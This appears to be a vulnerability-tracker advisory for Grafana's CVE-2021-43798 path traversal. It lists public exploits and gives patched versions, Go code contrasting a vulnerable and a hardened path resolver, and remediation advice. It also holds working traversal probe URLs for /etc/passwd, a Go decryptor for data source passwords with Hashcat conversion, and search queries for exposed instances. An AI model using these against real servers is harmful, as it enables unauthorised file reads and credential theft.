Exploitation Summary
CVE-2021-43798 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added October 9, 2025.
EIP tracks 63 public exploits from researchers including s1gh, jas502n and A-D-Team, as well as the Metasploit module auxiliary/scanner/http/grafana_plugin_traversal.
A Nuclei detection template is also available.
AI-analyzed exploit summary: This Python script exploits a directory traversal vulnerability in Grafana (CVE-2021-43798) by sending crafted HTTP requests to read arbitrary files on the target system. It leverages the `/public/plugins/` endpoint with traversal sequences to bypass restrictions.
Description
Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/<plugin_id>/`, where `<plugin_id>` is the plugin ID of any installed plugin; the traversal sequence is appended after it, and the endpoint is reachable without authentication. Note that most HTTP clients collapse `../` segments before sending a request, so a manual check needs a client that sends the path as written (for curl, `--path-as-is`). At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
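The following is an added example, not Grafana's own code and not code from any of the tracked exploits. It reproduces the shape of the bug in Go (Grafana's language): the wildcard tail of `/public/plugins/:pluginId/*` joined onto the plugin directory with `filepath.Join`, beside a hardened resolver that checks containment with `filepath.Rel`, plus a helper that builds the probe URLs the PoCs on this page iterate over. The plugin directory, hostname and plugin IDs are constructed assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// pluginDir is a constructed stand-in for the on-disk directory Grafana
// resolves for :pluginId (plugin.PluginDir); the path is an assumption.
const pluginDir = "/var/lib/grafana/plugins/alertlist"

// resolveVulnerable reproduces the shape of the flaw: the wildcard tail of
// /public/plugins/:pluginId/* is joined straight onto the plugin directory.
// filepath.Join cleans the result, so "../" segments walk out of pluginDir
// and "<pluginDir>/../../../../../../etc/passwd" collapses to "/etc/passwd".
func resolveVulnerable(requested string) string {
	return filepath.Join(pluginDir, requested)
}

var errOutsidePluginDir = errors.New("requested file escapes the plugin directory")

// resolveHardened joins the same way but refuses any result that is not
// inside pluginDir. Containment is checked with filepath.Rel rather than
// strings.HasPrefix(full, pluginDir), because a prefix check would accept a
// sibling directory such as "/var/lib/grafana/plugins/alertlist-evil/x".
func resolveHardened(requested string) (string, error) {
	full := filepath.Join(pluginDir, requested)
	rel, err := filepath.Rel(pluginDir, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errOutsidePluginDir
	}
	return full, nil
}

// probeURLs builds the request paths the public PoCs iterate over: one per
// candidate plugin ID, with enough "../" to reach the filesystem root from
// any plausible plugin directory. Send them with a client that does not
// collapse dot-segments (curl --path-as-is); browsers and most HTTP
// libraries normalise the path client-side and the traversal never reaches
// Grafana.
func probeURLs(base string, pluginIDs []string, target string) []string {
	urls := make([]string, 0, len(pluginIDs))
	for _, id := range pluginIDs {
		urls = append(urls, fmt.Sprintf("%s/public/plugins/%s/%s%s",
			strings.TrimRight(base, "/"), id, strings.Repeat("../", 8), strings.TrimPrefix(target, "/")))
	}
	return urls
}

func main() {
	for _, req := range []string{"module.js", "../../../../../../etc/passwd", "../alertlist-evil/module.js"} {
		fmt.Printf("%-32s vulnerable -> %s\n", req, resolveVulnerable(req))
		if p, err := resolveHardened(req); err != nil {
			fmt.Printf("%-32s hardened   -> rejected: %v\n", req, err)
		} else {
			fmt.Printf("%-32s hardened   -> %s\n", req, p)
		}
	}
	// Constructed target and plugin IDs; alertlist and welcome are core panels
	// commonly present in 8.x installs.
	for _, u := range probeURLs("http://grafana.example:3000", []string{"alertlist", "welcome"}, "/etc/passwd") {
		fmt.Println(u)
	}
}
```

A 200 response whose body is not a plugin asset (for `/etc/passwd`, lines of the form `root:x:0:0:`) confirms the read; a 404 for every plugin ID on a patched version is the expected negative result.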
Exploits (63)
This Python script exploits a directory traversal vulnerability in Grafana (CVE-2021-43798) by sending crafted HTTP requests to read arbitrary files on the target system. It leverages the `/public/plugins/` endpoint with traversal sequences to bypass restrictions.
This repository contains a Go-based proof-of-concept for decrypting Grafana data source passwords encrypted with AES-256 (CFB/GCM). It leverages the known `secret_key` from Grafana's configuration to reverse the encryption applied to sensitive fields like passwords stored in `secureJsonData`.
This repository contains a functional exploit for CVE-2021-43798, a path traversal vulnerability in Grafana. The tool automates detection, key extraction, and decryption of the Grafana database to expose data source credentials.
This is a functional proof-of-concept exploit for CVE-2021-43798, an unauthorized arbitrary file read vulnerability in Grafana. The script tests multiple payloads to read sensitive files (e.g., /etc/passwd, grafana.db) and decrypts credentials from the database using a secret key.
This repository contains a functional exploit for CVE-2021-43798, a pre-authentication path traversal vulnerability in Grafana 8.x. The exploit allows attackers to read arbitrary files from the server, including sensitive configuration files and the SQLite database.
This repository contains a Go-based proof-of-concept exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana 8.x. The tool can verify and exploit the vulnerability to read sensitive files like /etc/passwd or Grafana's database.
This repository contains a Nuclei template for detecting CVE-2021-43798, a path traversal vulnerability in Grafana 8.x allowing arbitrary file read. The template includes payloads for both Windows and Linux systems, targeting sensitive files like /etc/passwd and c:/windows/win.ini.
This repository contains a Python script that exploits CVE-2021-43798, an unauthenticated arbitrary file read vulnerability in Grafana. The script checks for the vulnerability by attempting to read the /etc/passwd file via path traversal in the public/plugins endpoint.
This PoC exploits CVE-2021-43798, an arbitrary file read vulnerability in Grafana, by sending crafted requests to read sensitive files like /etc/passwd. It iterates through a list of plugin paths to confirm the vulnerability.
This repository contains a Python script that exploits CVE-2021-43798, an arbitrary file read vulnerability in Grafana 8.x. The script tests multiple paths to read sensitive files like /etc/passwd by leveraging directory traversal via plugin paths.
This repository contains a Python script that scans for CVE-2021-43798, a directory traversal vulnerability in Grafana. The script checks for the presence of the vulnerability by attempting to read the /etc/passwd file through a crafted URL.
This repository contains a Python script that exploits CVE-2021-43798, a directory traversal vulnerability in Grafana, to decrypt DataSource passwords from the `grafana.db` file using the `secret_key` from `grafana.ini`. The script includes functions for both decryption and encryption using AES-CFB and AES-GCM modes.
This repository contains a proof-of-concept exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana. The tool automates detection, extracts secret keys, decrypts the server-side database, and outputs data source information.
This is a Ruby script that exploits CVE-2021-43798, a directory traversal vulnerability in Grafana. It attempts to read the /etc/passwd file by traversing directories via a crafted URL path.
This exploit demonstrates a directory traversal vulnerability in Grafana, allowing arbitrary file read via path manipulation in the plugin endpoint. The PoC sends crafted requests to read files like /etc/passwd.
This PoC exploits CVE-2021-43798, a directory traversal vulnerability in Grafana, to leak sensitive files like /etc/passwd. It includes version detection and multi-threaded scanning capabilities.
This is a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana. It allows arbitrary file read by manipulating the plugin path in the URL.
This is a Python-based automated exploit tool for CVE-2021-43798, a path traversal vulnerability in Grafana. It scans for vulnerable plugins and extracts sensitive files such as SSH keys and system configuration files.
This is a functional exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana versions 8.0.0 to 8.3.0. It automates the discovery of vulnerable paths and provides an interactive shell to read arbitrary files from the target system.
This repository contains a Python script to decrypt and encrypt sensitive data in Grafana, leveraging the AES algorithm with a secret key from the configuration file. It addresses CVE-2021-43798, which involves the exposure of encrypted data source passwords.
This repository contains a Python script that exploits CVE-2021-43798, a directory traversal vulnerability in Grafana 8.x, allowing unauthorized attackers to read arbitrary files on the server. The script includes a multi-threaded scanner to test multiple endpoints and verify the vulnerability.
This Go-based exploit targets CVE-2021-43798, an arbitrary file read vulnerability in Grafana 8.x. It iterates through a list of plugin IDs to construct paths for reading sensitive files via directory traversal.
This repository contains functional Python tools for decrypting Grafana passwords from both AES-256 encrypted data sources and PBKDF2_HMAC_SHA256 user hashes, leveraging CVE-2021-43798 path traversal to extract the database and configuration files.
This repository contains functional Python tools for decrypting AES-256 encrypted Grafana data source passwords and converting PBKDF2_HMAC_SHA256 user password hashes for Hashcat cracking, specifically targeting post-exploitation after CVE-2021-43798 path traversal.
This repository contains a Python toolkit for decrypting Grafana passwords extracted via CVE-2021-43798, a path traversal vulnerability. It includes tools to decrypt AES-256 encrypted passwords and convert PBKDF2 hashes for cracking with Hashcat.
This exploit leverages a directory traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0 to read arbitrary files. It iterates through a list of known plugins to find a vulnerable endpoint and retrieves the specified file.
This is a functional PoC for CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 to 8.3.0. The script attempts to read arbitrary files (default: /etc/passwd) by exploiting path traversal in the `/public/plugins/` endpoint.
This is a Python-based exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana. It leverages vulnerable plugins to read arbitrary files from the target system by sending crafted HTTP requests.
This repository contains a Python-based proof-of-concept exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana. The exploit leverages path traversal to read sensitive files like /etc/passwd by manipulating the plugin URL path.
This is a functional exploit for CVE-2021-43798, a path traversal vulnerability in Grafana versions 8.0.0-beta1 to 8.3.0. It checks for vulnerable plugins and reads arbitrary files via directory traversal.
This repository contains a working proof-of-concept for CVE-2021-43798, a directory traversal vulnerability in Grafana. The exploit leverages improper path validation in the `/public/plugins` endpoint to read arbitrary files on the server.
This repository contains a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0. It includes a PoC for arbitrary file reads and a helper tool to decrypt Grafana secrets.
This repository contains a functional Python-based exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana 8.x. The exploit automates file retrieval via the `/public/plugins/` endpoint, supporting both interactive and batch modes, with features like file download, binary handling, and automated loot collection.
The repository contains a functional Python script that exploits CVE-2021-43798, a path traversal vulnerability in Grafana. The script attempts to read arbitrary files (e.g., /etc/passwd) by manipulating plugin paths in the URL.
This repository contains a functional Python exploit for CVE-2021-43798, a Local File Inclusion (LFI) vulnerability in Grafana versions 8.0.0 to 8.3.0. The exploit automates the process of testing multiple payloads and paths to read sensitive files, including the Grafana database and configuration files, and attempts to decrypt passwords using the secret key.
This repository contains a functional Python exploit for CVE-2021-43798, a Local File Inclusion (LFI) vulnerability in Grafana versions 8.0.0 to 8.3.0. The exploit automates directory traversal attacks to read sensitive files like /etc/passwd and grafana.db, and includes decryption logic for extracting passwords from the database.
This repository contains a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana. The Python script automates the discovery of vulnerable paths and allows reading arbitrary files from the target system.
This repository contains a functional exploit PoC for CVE-2021-43798, a path traversal vulnerability in Grafana. The script attempts to read the /etc/passwd file by exploiting the vulnerability in the public/plugins endpoint.
This repository contains a functional exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana 8.x. The exploit uses path traversal via plugin endpoints to read sensitive files like /etc/passwd.
This repository contains two bash scripts that exploit CVE-2021-43798, a path traversal vulnerability in Grafana. The scripts enumerate vulnerable plugins and attempt to read sensitive files on both Windows and Linux systems.
This PoC demonstrates a path traversal vulnerability in Grafana (CVE-2021-43798) by exploiting improper sanitization in the /public/plugins/:pluginId endpoint to read arbitrary files like /etc/passwd. It includes a multi-threaded scanner to test multiple URLs for vulnerability.
This script exploits CVE-2021-43798, a Local File Inclusion (LFI) vulnerability in Grafana 8.x, by sending a crafted HTTP request to read arbitrary files via path traversal. It uses curl to fetch files from the target system and displays the output with colored formatting.
This repository contains a Bash script designed to test for path traversal vulnerabilities in Grafana by sending HTTP requests to a list of paths and capturing successful responses. It automates the process of checking for CVE-2021-43798 by leveraging curl with the --path-as-is flag to bypass path normalization.
This is a functional exploit for CVE-2021-43798, a Local File Inclusion (LFI) vulnerability in Grafana. It automates the discovery of vulnerable plugins and extracts sensitive files like `/etc/passwd` and `grafana.ini`.
This is a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana. It allows arbitrary file read on both Windows and Linux systems by leveraging path traversal techniques.
This is a Python script that exploits a directory traversal vulnerability in Grafana 8.3.0, allowing an attacker to read arbitrary files on the server. The script provides an interactive interface for specifying files to read via a crafted URL path.
This is a Python-based automated exploit tool for CVE-2021-43798, targeting Grafana's path traversal vulnerability to extract sensitive files like SSH keys and configuration files. It includes functionality for scanning single or multiple targets and downloading exposed files.
This repository provides a working proof-of-concept for CVE-2021-43798, a directory traversal vulnerability in Grafana versions prior to 8.3.1. It includes curl commands to exploit the vulnerability and read arbitrary files on the server.
This PoC exploits a directory traversal vulnerability (CVE-2021-43798) in Grafana by sending a crafted HTTP GET request to access sensitive files (e.g., /etc/passwd) via path traversal sequences. The script uses the requests library to fetch the file contents from the target server.
This repository provides a writeup and instructions for exploiting CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0. It includes steps for using Burp Suite to exploit the vulnerability and access local files.
This PoC exploits CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0. It checks the target's version and performs an LFI attack to read sensitive files like /etc/passwd or Windows hosts file.
This is a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana. It allows unauthorized arbitrary file read by leveraging a path traversal attack via the `/public/plugins/` endpoint.
This PoC exploits CVE-2021-43798, a path traversal vulnerability in Grafana, to read arbitrary files (e.g., /etc/passwd) and steal SSH keys for privilege escalation. It automates the process of identifying vulnerable plugins, exfiltrating sensitive data, and attempting privilege escalation via SUID binaries.
This is a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 to 8.3.0. It allows arbitrary file reads by manipulating the plugin path parameter.
This repository contains a Rust-based scanner for detecting the Grafana path traversal vulnerability (CVE-2021-43798). It checks for the presence of the vulnerability by attempting to read sensitive files (e.g., /etc/passwd) via crafted HTTP requests.
This repository provides a proof-of-concept for CVE-2021-43798, a directory traversal vulnerability in Grafana. The exploit allows unauthorized file read access via a crafted HTTP GET request to the `/public/plugins/` endpoint.
The repository contains only a README.md file with the CVE identifier and no exploit code or technical details. It appears to be a placeholder or stub.
The repository contains a functional Python script that exploits CVE-2021-43798, a path traversal vulnerability in Grafana, allowing unauthenticated attackers to read arbitrary files from the server. The script checks for the vulnerability by attempting to read /etc/passwd via a crafted URL path.
This repository contains a functional Python script that exploits CVE-2021-43798, a directory traversal vulnerability in Grafana 8.3.0. The script allows an attacker to read arbitrary files on the target system by sending crafted HTTP requests.
This repository contains a functional exploit for CVE-2021-43798, a directory traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0. The exploit automates the process of checking for vulnerable versions and retrieving local files via crafted requests to the vulnerable endpoint.
This repository contains a functional exploit for CVE-2021-43798, an arbitrary file read vulnerability in Grafana. The exploit leverages path traversal via the `/public/plugins/grafana-clock-panel/` endpoint to read sensitive files like `/etc/passwd`.
This repository contains a functional exploit for CVE-2021-43798, a pre-authentication path traversal vulnerability in Grafana 8.x. The exploit leverages the `/public/plugins/:pluginId` endpoint to read arbitrary files on the filesystem by manipulating the path parameter.
This Metasploit module exploits a directory traversal vulnerability in Grafana (CVE-2021-43798) by leveraging plugin paths to access arbitrary files. It checks for vulnerable versions and attempts to retrieve specified files using traversal sequences.
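Several of the tracked repositories follow the file read with decryption of `secureJsonData` values from `grafana.db` using `secret_key` from `grafana.ini`, and others convert the PBKDF2_HMAC_SHA256 user hashes for Hashcat. The example below is added here and is not code from any of those repositories. It implements the legacy (pre-GCM) AES-256-CFB layout as I understand it from Grafana's encryption code: base64 of an 8-byte salt, a 16-byte IV and the ciphertext, with the key derived as PBKDF2-HMAC-SHA256(secret_key, salt, 10000 iterations, 32 bytes); that layout, the iteration count, and the hashcat mode 10900 line format `sha256:iters:b64salt:b64digest` are assumptions to verify against your Grafana version. PBKDF2 is written out so only the standard library is needed; the AES-GCM variant is not covered. The plaintext and salt are constructed, and `SW2YcwTIb9zpOOhoPsMm` is the secret_key shipped in Grafana's sample configuration.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
)

// Assumed layout of a legacy secureJsonData value:
// base64( salt[8] || iv[16] || AES-256-CFB(plaintext) ),
// key = PBKDF2-HMAC-SHA256(secret_key, salt, 10000, 32).
const (
	saltLen    = 8
	pbkdfIters = 10000
	keyLen     = 32
)

// pbkdf2SHA256 is a minimal RFC 8018 PBKDF2 over HMAC-SHA256.
func pbkdf2SHA256(password, salt []byte, iters, dkLen int) []byte {
	prf := hmac.New(sha256.New, password)
	var out []byte
	for blk := 1; len(out) < dkLen; blk++ {
		var idx [4]byte
		binary.BigEndian.PutUint32(idx[:], uint32(blk))
		prf.Reset()
		prf.Write(salt)
		prf.Write(idx[:])
		u := prf.Sum(nil)              // U_1 = PRF(P, S || INT(blk))
		t := append([]byte(nil), u...) // T = U_1 xor U_2 xor ... xor U_c
		for i := 1; i < iters; i++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:dkLen]
}

// encryptLegacy mirrors what the server does when a data source is saved; it
// is here so the decryptor can be exercised offline.
func encryptLegacy(plaintext []byte, secretKey string) (string, error) {
	buf := make([]byte, saltLen+aes.BlockSize+len(plaintext))
	if _, err := rand.Read(buf[:saltLen+aes.BlockSize]); err != nil {
		return "", err
	}
	salt, iv := buf[:saltLen], buf[saltLen:saltLen+aes.BlockSize]
	block, err := aes.NewCipher(pbkdf2SHA256([]byte(secretKey), salt, pbkdfIters, keyLen))
	if err != nil {
		return "", err
	}
	cipher.NewCFBEncrypter(block, iv).XORKeyStream(buf[saltLen+aes.BlockSize:], plaintext)
	return base64.StdEncoding.EncodeToString(buf), nil
}

// decryptLegacy is the post-exploitation step: value from grafana.db plus
// secret_key from grafana.ini. CFB has no integrity check, so a wrong key
// returns garbage rather than an error; sanity-check the output.
func decryptLegacy(encoded, secretKey string) ([]byte, error) {
	payload, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil {
		return nil, err
	}
	if len(payload) < saltLen+aes.BlockSize {
		return nil, errors.New("payload too short for salt and IV")
	}
	salt, iv, ct := payload[:saltLen], payload[saltLen:saltLen+aes.BlockSize], payload[saltLen+aes.BlockSize:]
	block, err := aes.NewCipher(pbkdf2SHA256([]byte(secretKey), salt, pbkdfIters, keyLen))
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCFBDecrypter(block, iv).XORKeyStream(pt, ct)
	return pt, nil
}

// userHashToHashcat turns the hex PBKDF2 digest and salt columns of the user
// table into a hashcat mode 10900 line (assumed format).
func userHashToHashcat(hexDigest, salt string) (string, error) {
	digest, err := hex.DecodeString(hexDigest)
	if err != nil {
		return "", err
	}
	return fmt.Sprintf("sha256:%d:%s:%s", pbkdfIters,
		base64.StdEncoding.EncodeToString([]byte(salt)),
		base64.StdEncoding.EncodeToString(digest)), nil
}

func main() {
	const secretKey = "SW2YcwTIb9zpOOhoPsMm" // Grafana's sample-config default
	enc, _ := encryptLegacy([]byte("datasource-password"), secretKey) // constructed plaintext
	pt, err := decryptLegacy(enc, secretKey)
	fmt.Printf("stored: %s\nrecovered: %q err=%v\n", enc, pt, err)
	line, _ := userHashToHashcat("00ff", "abc") // constructed digest and salt
	fmt.Println(line)
}
```

The defensive reading of this block: a default or leaked `secret_key` turns a file read of `grafana.db` and `grafana.ini` into cleartext data source credentials, so rotating `secret_key` and every data source secret is part of remediating an exposed instance, not just upgrading.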
Nuclei Templates (1)
Search queries for locating exposed Grafana instances (internet scanner syntax):
title:"Grafana" || cpe:"cpe:2.3:a:grafana:grafana" || http.title:"grafana"
title="grafana" || app="grafana"
Scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (base score 7.5, High: network-reachable, no privileges or user interaction required, full confidentiality impact with no integrity or availability impact)